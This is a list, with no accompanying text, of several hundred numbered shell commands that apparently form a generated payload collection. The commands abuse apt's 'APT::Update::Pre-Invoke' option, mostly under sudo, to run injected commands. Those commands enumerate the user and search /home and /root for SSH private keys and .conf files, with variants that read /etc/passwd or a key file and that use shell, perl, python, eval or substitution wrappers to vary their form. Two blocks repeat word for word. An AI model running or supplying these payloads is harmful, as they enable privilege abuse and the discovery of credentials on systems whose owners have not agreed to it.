1. `sudo apt -o 'APT::Update::Pre-Invoke::=whoami; find /home /root -name id_rsa -o -name "*.conf" 2>/dev/null' update -qq`
2. `sudo apt -o "APT::Update::Pre-Invoke::= whoami ; find /home /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null" update -qq`
3. `sudo apt -o APT::Update::Pre-Invoke::="whoami;find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
4. `sudo apt -o "APT::Update::Pre-Invoke::=whoami;find /home /root -name 'id_rsa' -o -name '*.conf' 2> /dev/null" update -qq`
5. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name id_rsa -o -name *.conf 2>/dev/null" update -qq`
6. `sudo apt -o "APT::Update::Pre-Invoke::=whoami;find /home /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null;" update -qq`
7. `sudo apt -o 'APT::Update::Pre-Invoke::=whoami;find /home /root -name "id_rsa" -o -name "*.conf" 2>/dev/null' update -qq`
8. `sudo apt -o "APT::Update::Pre-Invoke::=whoami ;find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
9. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null #" update -qq`
10. `sudo apt -o "APT::Update::Pre-Invoke::= whoami;find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null #" update -qq`
11. `sudo apt -o "APT::Update::Pre-Invoke::=whoami;find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null ;" update -qq`
12. `sudo apt -o 'APT::Update::Pre-Invoke::= whoami; find /home /root -name id_rsa -o -name "*.conf" 2>/dev/null' update -qq`
13. `sudo apt -o "APT::Update::Pre-Invoke::=whoami;find /home /root \( -name id_rsa -o -name '*.conf' \) 2>/dev/null" update -qq`
14. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root \( -name 'id_rsa' -o -name '*.conf' \) 2>/dev/null" update -qq`
15. `sudo apt -o APT::Update::Pre-Invoke::='whoami; find /home /root -name id_rsa -o -name "*.conf" 2>/dev/null' update -qq`
16. `sudo apt -o "APT::Update::Pre-Invoke::=whoami;find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null || true" update -qq`
17. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null || :" update -qq`
18. `sudo apt -o 'APT::Update::Pre-Invoke::=whoami;find /home /root -name id_rsa -o -name "*.conf" 2>/dev/null || true' update -qq`
19. `sudo apt -o "APT::Update::Pre-Invoke::=whoami;find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null && :" update -qq`
20. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null && true" update -qq`
21. `sudo apt -o "APT::Update::Pre-Invoke::=whoami;find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null | cat" update -qq`
22. `sudo apt -o 'APT::Update::Pre-Invoke::=whoami; find /home /root -name id_rsa -o -name "*.conf" 2>/dev/null | cat' update -qq`
23. `sudo apt -o "APT::Update::Pre-Invoke::=whoami;find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null ;:" update -qq`
24. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null ; true" update -qq`
25. `sudo apt -o "APT::Update::Pre-Invoke::=whoami ; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null ;:" update -qq`
26. `sudo apt -o 'APT::Update::Pre-Invoke::=whoami;find /home /root -name id_rsa -o -name "*.conf" 2>/dev/null ;' update -qq`
27. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null && true ;" update -qq`
28. `sudo apt -o "APT::Update::Pre-Invoke::=whoami;find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null || true ;" update -qq`
29. `sudo apt -o "APT::Update::Pre-Invoke::= whoami; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null | :" update -qq`
30. `sudo apt -o 'APT::Update::Pre-Invoke::= whoami;find /home /root -name id_rsa -o -name "*.conf" 2>/dev/null | :' update -qq`
1. `sudo apt -o "APT::Update::Pre-Invoke::='whoami; find /home /root -name id_rsa -o -name *.conf 2>/dev/null'" update -qq`
2. `sudo apt -o "APT::Update::Pre-Invoke::= 'whoami'; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
3. `sudo apt -o "APT::Update::Pre-Invoke::=whoami ; find /home /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null ;" update -qq`
4. `sudo apt -o "APT::Update::Pre-Invoke::= $(echo whoami); find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
5. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -type f \( -name id_rsa -o -name '*.conf' \) 2>/dev/null" update -qq`
6. `sudo apt -o "APT::Update::Pre-Invoke::=whoami ; find /home /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null || echo done" update -qq`
7. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; echo check && find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
8. `sudo apt -o "APT::Update::Pre-Invoke::=whoami && find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
9. `sudo apt -o "APT::Update::Pre-Invoke::=whoami && echo marker; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
10. `sudo apt -o "APT::Update::Pre-Invoke::=whoami #comment; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
11. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home -name id_rsa -o -name '*.conf' 2>/dev/null; echo done" update -qq`
12. `sudo apt -o "APT::Update::Pre-Invoke::='whoami'; find /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
13. `sudo apt -o 'APT::Update::Pre-Invoke::= whoami ; find /home -name id_rsa -o -name "*.conf" 2>/dev/null' update -qq`
14. `sudo apt -o "APT::Update::Pre-Invoke::=whoami;find /home /root \( -name id_rsa -or -name '*.conf' \) 2>/dev/null" update -qq`
15. `sudo apt -o "APT::Update::Pre-Invoke::=whoami ; find /{home,root} -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
16. `sudo apt -o "APT::Update::Pre-Invoke::=whoami && find /home -name '*.conf' 2>/dev/null || true" update -qq`
17. `sudo apt -o "APT::Update::Pre-Invoke::=whoami ; :; find /home -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
18. `sudo apt -o "APT::Update::Pre-Invoke::=find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null ; whoami" update -qq`
19. `sudo apt -o "APT::Update::Pre-Invoke::=echo test; whoami; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
20. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; printf ok; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
21. `sudo apt -o "APT::Update::Pre-Invoke::=find /home -name id_rsa; whoami; find /root -name '*.conf' 2>/dev/null" update -qq`
22. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; cd /; find home root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
23. `sudo apt -o "APT::Update::Pre-Invoke::=sleep 1; whoami; find /home -name '*.conf' 2>/dev/null" update -qq`
24. `sudo apt -o "APT::Update::Pre-Invoke::=whoami | cat; find /home -name '*.conf' 2>/dev/null" update -qq`
25. `sudo apt -o "APT::Update::Pre-Invoke::=echo ok; whoami; find /home -name id_rsa 2>/dev/null" update -qq`
26. `sudo apt -o "APT::Update::Pre-Invoke::=true; whoami; find /home -name '*.conf' 2>/dev/null" update -qq`
27. `sudo apt -o "APT::Update::Pre-Invoke::=find /home -name id_rsa; find /root -name '*.conf' 2>/dev/null" update -qq`
28. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; echo ';'; find /home -name '*.conf' 2>/dev/null" update -qq`
29. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; echo find start; find /home -name id_rsa 2>/dev/null" update -qq`
30. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; echo end; find /root -name '*.conf' 2>/dev/null" update -qq`
1. `sudo apt -o "APT::Update::Pre-Invoke::='whoami; find /home /root -name id_rsa -o -name *.conf 2>/dev/null'" update -qq`
2. `sudo apt -o "APT::Update::Pre-Invoke::= 'whoami'; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
3. `sudo apt -o "APT::Update::Pre-Invoke::=whoami ; find /home /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null ;" update -qq`
4. `sudo apt -o "APT::Update::Pre-Invoke::= $(echo whoami); find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
5. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -type f \( -name id_rsa -o -name '*.conf' \) 2>/dev/null" update -qq`
6. `sudo apt -o "APT::Update::Pre-Invoke::=whoami ; find /home /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null || echo done" update -qq`
7. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; echo check && find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
8. `sudo apt -o "APT::Update::Pre-Invoke::=whoami && find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
9. `sudo apt -o "APT::Update::Pre-Invoke::=whoami && echo marker; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
10. `sudo apt -o "APT::Update::Pre-Invoke::=whoami #comment; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
11. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home -name id_rsa -o -name '*.conf' 2>/dev/null; echo done" update -qq`
12. `sudo apt -o "APT::Update::Pre-Invoke::='whoami'; find /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
13. `sudo apt -o 'APT::Update::Pre-Invoke::= whoami ; find /home -name id_rsa -o -name "*.conf" 2>/dev/null' update -qq`
14. `sudo apt -o "APT::Update::Pre-Invoke::=whoami;find /home /root \( -name id_rsa -or -name '*.conf' \) 2>/dev/null" update -qq`
15. `sudo apt -o "APT::Update::Pre-Invoke::=whoami ; find /{home,root} -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
16. `sudo apt -o "APT::Update::Pre-Invoke::=whoami && find /home -name '*.conf' 2>/dev/null || true" update -qq`
17. `sudo apt -o "APT::Update::Pre-Invoke::=whoami ; :; find /home -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
18. `sudo apt -o "APT::Update::Pre-Invoke::=find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null ; whoami" update -qq`
19. `sudo apt -o "APT::Update::Pre-Invoke::=echo test; whoami; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
20. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; printf ok; find /home /root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
21. `sudo apt -o "APT::Update::Pre-Invoke::=find /home -name id_rsa; whoami; find /root -name '*.conf' 2>/dev/null" update -qq`
22. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; cd /; find home root -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
23. `sudo apt -o "APT::Update::Pre-Invoke::=sleep 1; whoami; find /home -name '*.conf' 2>/dev/null" update -qq`
24. `sudo apt -o "APT::Update::Pre-Invoke::=whoami | cat; find /home -name '*.conf' 2>/dev/null" update -qq`
25. `sudo apt -o "APT::Update::Pre-Invoke::=echo ok; whoami; find /home -name id_rsa 2>/dev/null" update -qq`
26. `sudo apt -o "APT::Update::Pre-Invoke::=true; whoami; find /home -name '*.conf' 2>/dev/null" update -qq`
27. `sudo apt -o "APT::Update::Pre-Invoke::=find /home -name id_rsa; find /root -name '*.conf' 2>/dev/null" update -qq`
28. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; echo ';'; find /home -name '*.conf' 2>/dev/null" update -qq`
29. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; echo find start; find /home -name id_rsa 2>/dev/null" update -qq`
30. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; echo end; find /root -name '*.conf' 2>/dev/null" update -qq`
1. `sudo apt -oAPT::Update::Pre-Invoke::='sh -c "whoami; find /home /root -name id_rsa -o -name \*.conf 2>/dev/null"' update -qq`
2. `sudo apt -oAPT::Update::Pre-Invoke::="command -v whoami && find /home /root -name id_rsa -o -name *.conf" update -qq`
3. `sudo apt -oAPT::Update::Pre-Invoke::="find /home -type f -name id_rsa; find /root -name '*.conf'" update -qq`
4. `sudo apt -oAPT::Update::Pre-Invoke::="set +e; whoami; find /home /root -name id_rsa -o -name *.conf" update -qq`
5. `sudo apt -oAPT::Update::Pre-Invoke::="(whoami; find /home /root -name id_rsa -o -name *.conf)" update -qq`
6. `sudo apt -oAPT::Update::Pre-Invoke::="timeout 1 whoami; find /home /root -name id_rsa -o -name *.conf" update -qq`
7. `sudo apt -oAPT::Update::Pre-Invoke::="nice -n 10 whoami; find /home /root -name id_rsa -o -name *.conf" update -qq`
8. `sudo apt -oAPT::Update::Pre-Invoke::="ionice -c3 whoami; find /home /root -name id_rsa -o -name *.conf" update -qq`
9. `sudo apt -oAPT::Update::Pre-Invoke::="true && whoami; find /home /root -name id_rsa -o -name *.conf" update -qq`
10. `sudo apt -oAPT::Update::Pre-Invoke::="echo dummy; whoami; find /home /root -name id_rsa" update -qq`
11. `sudo apt -oAPT::Update::Pre-Invoke::="find /home /root -name id_rsa -exec echo {} \;; whoami" update -qq`
12. `sudo apt -oAPT::Update::Pre-Invoke::="find /home /root -name id_rsa -print0 | xargs -0 echo; whoami" update -qq`
13. `sudo apt -oAPT::Update::Pre-Invoke::="whoami; grep -r id_rsa /home /root 2>/dev/null" update -qq`
14. `sudo apt -oAPT::Update::Pre-Invoke::="stat /home /root/id_rsa 2>/dev/null; whoami" update -qq`
15. `sudo apt -oAPT::Update::Pre-Invoke::="ls /home /root | grep id_rsa; whoami" update -qq`
16. `sudo apt -oAPT::Update::Pre-Invoke::="head -n 1 /home/user/.ssh/id_rsa 2>/dev/null; whoami" update -qq`
17. `sudo apt -oAPT::Update::Pre-Invoke::="whoami; find /home /root -type f -regex '.*id_rsa\|.*\.conf'" update -qq`
18. `sudo apt -oAPT::Update::Pre-Invoke::="whoami; find /{home,root} -name id_rsa -o -name *.conf" update -qq`
19. `sudo apt -oAPT::Update::Pre-Invoke::="find / -path '/home/*/id_rsa' -o -name '*.conf' 2>/dev/null; whoami" update -qq`
20. `sudo apt -oAPT::Update::Pre-Invoke::="bash -c 'whoami && find /home /root -name id_rsa -o -name *.conf'" update -qq`
21. `sudo apt -oAPT::Update::Pre-Invoke::="perl -e 'system(\"whoami\")'; find /home /root -name id_rsa" update -qq`
22. `sudo apt -oAPT::Update::Pre-Invoke::="python3 -c 'import os; os.system(\"whoami\")'; find /root -name id_rsa" update -qq`
23. `sudo apt -oAPT::Update::Pre-Invoke::="sh -c 'whoami'; sh -c 'find /home /root -name id_rsa -o -name *.conf'" update -qq`
24. `sudo apt -oAPT::Update::Pre-Invoke::="$(echo 'whoami; find /home /root -name id_rsa -o -name *.conf')" update -qq`
25. `sudo apt -oAPT::Update::Pre-Invoke::="$(printf 'whoami;find /home /root -name id_rsa -o -name *.conf')" update -qq`
26. `sudo apt -oAPT::Update::Pre-Invoke::='eval "whoami; find /home /root -name id_rsa -o -name *.conf"' update -qq`
27. `sudo apt -oAPT::Update::Pre-Invoke::='command whoami; find /home /root -name id_rsa -o -name *.conf' update -qq`
28. `sudo apt -oAPT::Update::Pre-Invoke::='bash -c whoami;bash -c "find /home /root -name id_rsa -o -name *.conf"' update -qq`
29. `sudo apt -oAPT::Update::Pre-Invoke::='touch /tmp/test; whoami; find /home /root -name id_rsa -o -name *.conf' update -qq`
30. `sudo apt -oAPT::Update::Pre-Invoke::='alias whoami=whoami; whoami; find /home /root -name id_rsa -o -name *.conf' update -qq`
1. `sudo apt -o "apt::update::pre-invoke::=find /home /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null" update -qq`
2. `sudo apt -o "apt::update::pre-invoke::=whoami; find /home -name 'id_rsa' -o -name '*.conf'" update -qq`
3. `sudo apt -o "apt::update::pre-invoke::=find /root -name 'id_rsa'" update -qq`
4. `sudo apt -o "apt::update::pre-invoke::=find /home -name '*.conf'" update -qq`
5. `sudo apt -o "apt::update::pre-invoke::=whoami" update -qq`
6. `sudo apt -o "apt::update::pre-invoke::=find /home /root -name 'id_rsa'" update -qq`
7. `sudo apt -o "apt::update::pre-invoke::=find /home /root -name '*.conf'" update -qq`
8. `sudo apt -o "apt::update::pre-invoke::=find /home -name 'id_rsa'" update -qq`
9. `sudo apt -o "apt::update::pre-invoke::=find /root -name '*.conf'" update -qq`
10. `sudo apt -o "apt::update::pre-invoke::=whoami; find /home" update -qq`
11. `sudo apt -o "apt::update::pre-invoke::=find /home /root" update -qq`
12. `sudo apt -o "apt::update::pre-invoke::=whoami; find /root" update -qq`
13. `sudo apt -o "apt::update::pre-invoke::=whoami; find /home -name 'id_rsa'" update -qq`
14. `sudo apt -o "apt::update::pre-invoke::=whoami; find /root -name '*.conf'" update -qq`
15. `sudo apt -o "apt::update::pre-invoke::=find /home -name '*.conf' 2>/dev/null" update -qq`
16. `sudo apt -o "apt::update::pre-invoke::=find /root -name 'id_rsa' 2>/dev/null" update -qq`
17. `sudo apt -o "apt::update::pre-invoke::=whoami; find /home /root" update -qq`
18. `sudo apt -o "apt::update::pre-invoke::=whoami; find /home /root -name 'id_rsa'" update -qq`
19. `sudo apt -o "apt::update::pre-invoke::=whoami; find /home /root -name '*.conf'" update -qq`
20. `sudo apt -o "apt::update::pre-invoke::=find /home /root -name 'id_rsa'" update -qq`
21. `sudo apt -o "apt::update::pre-invoke::=find /home /root -name '*.conf'" update -qq`
22. `sudo apt -o "apt::update::pre-invoke::=find /home -name '*.conf' 2>/dev/null" update -qq`
23. `sudo apt -o "apt::update::pre-invoke::=find /home -name 'id_rsa' 2>/dev/null" update -qq`
24. `sudo apt -o "apt::update::pre-invoke::=whoami; find /home -name '*.conf' 2>/dev/null" update -qq`
25. `sudo apt -o "apt::update::pre-invoke::=whoami; find /root -name 'id_rsa' 2>/dev/null" update -qq`
26. `sudo apt -o "apt::update::pre-invoke::=find /root -name '*.conf' 2>/dev/null" update -qq`
27. `sudo apt -o "apt::update::pre-invoke::=find /home -name 'id_rsa' -o -name '*.conf'" update -qq`
28. `sudo apt -o "apt::update::pre-invoke::=find /root -name 'id_rsa' -o -name '*.conf'" update -qq`
29. `sudo apt -o "apt::update::pre-invoke::=find /home -name 'id_rsa' 2>/dev/null" update -qq`
30. `sudo apt -o "apt::update::pre-invoke::=find /home /root -name '*.conf' 2>/dev/null" update -qq`
1. `sudo apt -o "apt::update::pre-invoke::=find /home /root -name '*.conf'" update -qq`
2. `sudo apt -o "apt::update::pre-invoke::=find /home /root -name 'id_rsa' 2>/dev/null" update -qq`
3. `sudo apt -o "apt::update::pre-invoke::=whoami; find /root -name 'id_rsa'" update -qq`
4. `sudo apt -o "apt::update::pre-invoke::=whoami; find /home -name '*.conf'" update -qq`
5. `sudo apt -o "apt::update::pre-invoke::=find /home -name 'id_rsa' -o -name '*.conf'" update -qq`
6. `sudo apt -o "apt::update::pre-invoke::=find /root -name 'id_rsa' -o -name '*.conf'" update -qq`
7. `sudo apt -o "apt::update::pre-invoke::=find /home /root 2>/dev/null" update -qq`
8. `sudo apt -o "apt::update::pre-invoke::=find /home /root -type f" update -qq`
9. `sudo apt -o "apt::update::pre-invoke::=find /home -type f -name 'id_rsa'" update -qq`
10. `sudo apt -o "apt::update::pre-invoke::=find /root -type f -name '*.conf'" update -qq`
11. `sudo apt -o "apt::update::pre-invoke::=whoami; find /home /root -type f" update -qq`
12. `sudo apt -o "apt::update::pre-invoke::=find /home -name 'id_rsa' 2>/dev/null" update -qq`
13. `sudo apt -o "apt::update::pre-invoke::=find /root -name '*.conf' 2>/dev/null" update -qq`
14. `sudo apt -o "apt::update::pre-invoke::=whoami; ls -la /root" update -qq`
15. `sudo apt -o "apt::update::pre-invoke::=whoami; ls -la /home" update -qq`
16. `sudo apt -o "apt::update::pre-invoke::=ls -la /home /root" update -qq`
17. `sudo apt -o "apt::update::pre-invoke::=find / -name 'id_rsa'" update -qq`
18. `sudo apt -o "apt::update::pre-invoke::=find / -name '*.conf'" update -qq`
19. `sudo apt -o "apt::update::pre-invoke::=find /home -type f -iname '*.conf'" update -qq`
20. `sudo apt -o "apt::update::pre-invoke::=whoami; echo scanning..." update -qq`
21. `sudo apt -o "apt::update::pre-invoke::=whoami; find /etc" update -qq`
22. `sudo apt -o "apt::update::pre-invoke::=ls -lah /root" update -qq`
23. `sudo apt -o "apt::update::pre-invoke::=ls -lah /home" update -qq`
24. `sudo apt -o "apt::update::pre-invoke::=find /root -name '*.conf' -print" update -qq`
25. `sudo apt -o "apt::update::pre-invoke::=find /home -name 'id_rsa' -print" update -qq`
26. `sudo apt -o "apt::update::pre-invoke::=find /home -name 'id_rsa' -type f" update -qq`
27. `sudo apt -o "apt::update::pre-invoke::=find /root -name '*.conf' -type f" update -qq`
28. `sudo apt -o "apt::update::pre-invoke::=whoami; cat /etc/passwd" update -qq`
29. `sudo apt -o "apt::update::pre-invoke::=find /home /root -type f -iname '*.conf'" update -qq`
30. `sudo apt -o "apt::update::pre-invoke::=find /home /root -type f -iname 'id_rsa'" update -qq`
1. `apt update -qq -o "apt::update::pre-invoke::=whoami; find /home /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null"`
2. `apt -qq update -o "apt::update::pre-invoke::=whoami; find /home /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null"`
3. `apt -o "apt::update::pre-invoke::=whoami; find /home /root -name '*.conf' -o -name 'id_rsa' 2>/dev/null" -qq update`
4. `apt -o "apt::update::pre-invoke::=find /home /root -name '*.conf' -o -name 'id_rsa' 2>/dev/null; whoami" update -qq`
5. `apt -o "apt::update::pre-invoke::=find /home -name 'id_rsa' 2>/dev/null; whoami" update -qq`
6. `apt -qq -o "apt::update::pre-invoke::=find /home /root -name '*.conf'" update`
7. `apt -o "apt::update::pre-invoke::=whoami; find /root -name '*.conf'" update -qq`
8. `apt update -o "apt::update::pre-invoke::=find /root -name '*.conf' -o -name 'id_rsa'; whoami" -qq`
9. `apt -o "apt::update::pre-invoke::=find /home /root -name '*.conf' 2>/dev/null; whoami" update -qq`
10. `apt-get -o "apt::update::pre-invoke::=whoami; find /root -name '*.conf'" -qq update`
11. `apt-get -qq -o "apt::update::pre-invoke::=whoami; find /home -name 'id_rsa'" update`
12. `apt-get update -qq -o "apt::update::pre-invoke::=find /home /root -name '*.conf'; whoami"`
13. `apt-get update -o "apt::update::pre-invoke::=whoami; find /home -name 'id_rsa'" -qq`
14. `apt update -o "apt::update::pre-invoke::=find /home -name '*.conf' -o -name 'id_rsa'; whoami" -qq`
15. `apt -qq -o "apt::update::pre-invoke::=find /root -name '*.conf' -o -name 'id_rsa' 2>/dev/null; whoami" update`
16. `apt -o "apt::update::pre-invoke::=whoami; find /home -name '*.conf' -o -name 'id_rsa'" update -qq`
17. `apt-get -o "apt::update::pre-invoke::=whoami; find /root -name 'id_rsa'" update -qq`
18. `apt -o "apt::update::pre-invoke::=find /home -name '*.conf'; whoami" -qq update`
19. `apt update -o "apt::update::pre-invoke::=find /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null; whoami" -qq`
20. `apt-get -qq update -o "apt::update::pre-invoke::=find /home -name 'id_rsa'; whoami"`
21. `apt-get -o "apt::update::pre-invoke::=find /home -name '*.conf'" update -qq`
22. `apt -o "apt::update::pre-invoke::=find /root -name '*.conf'; whoami" update -qq`
23. `apt -qq update -o "apt::update::pre-invoke::=whoami; find /home -name '*.conf' 2>/dev/null"`
24. `apt-get -o "apt::update::pre-invoke::=find /home -name 'id_rsa' -o -name '*.conf'; whoami" update -qq`
25. `apt -o "apt::update::pre-invoke::=whoami; find /home -name '*.conf'" -qq update`
26. `apt-get -o "apt::update::pre-invoke::=find /root -name '*.conf'" update -qq`
27. `apt -o "apt::update::pre-invoke::=whoami; find /home -name 'id_rsa'" update -qq`
28. `apt -qq update -o "apt::update::pre-invoke::=find /root -name 'id_rsa'; whoami"`
29. `apt-get -o "apt::update::pre-invoke::=whoami; find /root -name '*.conf' 2>/dev/null" -qq update`
30. `apt -o "apt::update::pre-invoke::=find /home /root -name '*.conf' -o -name 'id_rsa'" update -qq`
1. `apt update -qq -o "APT::Update::Pre-Invoke::=whoami; find /home -name 'id_rsa' -o -name '*.conf' 2>/dev/null"`
2. `apt-get update -qq -o "APT::Update::Pre-Invoke::=whoami; find /root -name '*.conf' -o -name 'id_rsa' 2>/dev/null"`
3. `apt -qq -o "APT::Update::Pre-Invoke::=find /home -name '*.conf'; whoami" update`
4. `apt -o "APT::Update::Pre-Invoke::=find /root -name 'id_rsa'; whoami" update -qq`
5. `apt-get -qq -o "APT::Update::Pre-Invoke::=whoami; find /home -name '*.conf'" update`
6. `apt -o "APT::Update::Pre-Invoke::=find /home -name '*.conf' 2>/dev/null; whoami" -qq update`
7. `apt -o "APT::Update::Pre-Invoke::=find /home -name '*.conf'" update -qq`
8. `apt -qq update -o "APT::Update::Pre-Invoke::=whoami; find /root -name '*.conf'"`
9. `apt -qq -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name '*.conf'" update`
10. `apt-get -o "APT::Update::Pre-Invoke::=whoami; find /home -name '*.conf'" -qq update`
11. `apt -o "APT::Update::Pre-Invoke::=find /home -name '*.conf' -o -name 'id_rsa'; whoami" -qq update`
12. `apt-get -qq update -o "APT::Update::Pre-Invoke::=find /root -name 'id_rsa'"`
13. `apt update -o "APT::Update::Pre-Invoke::=find /home -name '*.conf'" -qq`
14. `apt -o "APT::Update::Pre-Invoke::=whoami" -qq update`
15. `apt -qq -o "APT::Update::Pre-Invoke::=whoami; find /home -name '*.conf'" update`
16. `apt-get -o "APT::Update::Pre-Invoke::=whoami; find /root -name 'id_rsa' 2>/dev/null" update -qq`
17. `apt -o "APT::Update::Pre-Invoke::=find /home /root -name 'id_rsa'" -qq update`
18. `apt -o "APT::Update::Pre-Invoke::=find /home -name '*.conf'; whoami" update -qq`
19. `apt-get update -o "APT::Update::Pre-Invoke::=whoami; find /root -name 'id_rsa'" -qq`
20. `apt update -o "APT::Update::Pre-Invoke::=find /home -name 'id_rsa' -o -name '*.conf'" -qq`
21. `apt -o "APT::Update::Pre-Invoke::=whoami" update -qq`
22. `apt-get -o "APT::Update::Pre-Invoke::=find /home -name '*.conf'" update -qq`
23. `apt-get -qq -o "APT::Update::Pre-Invoke::=find /root -name '*.conf'" update`
24. `apt -o "APT::Update::Pre-Invoke::=find /home -name '*.conf' 2>/dev/null" update -qq`
25. `apt -qq update -o "APT::Update::Pre-Invoke::=find /home -name 'id_rsa'; whoami"`
26. `apt update -qq -o "APT::Update::Pre-Invoke::=find /home -name 'id_rsa'"`
27. `apt-get update -qq -o "APT::Update::Pre-Invoke::=find /home /root -name 'id_rsa'"`
28. `apt -o "APT::Update::Pre-Invoke::=find /home -name '*.conf' -o -name 'id_rsa'" -qq update`
29. `apt -qq update -o "APT::Update::Pre-Invoke::=whoami"`
30. `apt-get -qq update -o "APT::Update::Pre-Invoke::=whoami; find /home -name '*.conf'"`
1. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null" update -qq`
2. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find ~ /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null" update -qq`
3. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -iname 'id_rsa' -o -iname '*.conf' 2>/dev/null" update -qq`
4. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /root /home -name 'id_rsa' -o -name '*.conf' 2>/dev/null" update -qq`
5. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /{home,root} -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
6. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name id_rsa -or -name '*.conf' 2>/dev/null" update -qq`
7. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home -name id_rsa -o -name '*.conf' 2>/dev/null" update -qq`
8. `sudo apt -o "APT::Update::Pre-Invoke::=id -un; find /home /root -name 'id_rsa' -o -name '*.conf' 2>/dev/null" update -qq`
9. `sudo apt -o "APT::Update::Pre-Invoke::='id -u'; find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
10. `sudo apt -o "APT::Update::Pre-Invoke::=printf root; find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
11. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home -type f -name id_rsa -o -name '*.conf'" update -qq`
12. `sudo apt -o "APT::Update::Pre-Invoke::=env whoami; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
13. `sudo apt -o "APT::Update::Pre-Invoke::=sh -c 'whoami'; find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
14. `sudo apt -o "APT::Update::Pre-Invoke::=echo $(whoami); find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
15. `sudo apt -o "APT::Update::Pre-Invoke::=perl -e 'system(\"whoami\")'; find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
16. `sudo apt -o "APT::Update::Pre-Invoke::=python3 -c 'import os; os.system(\"whoami\")'; find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
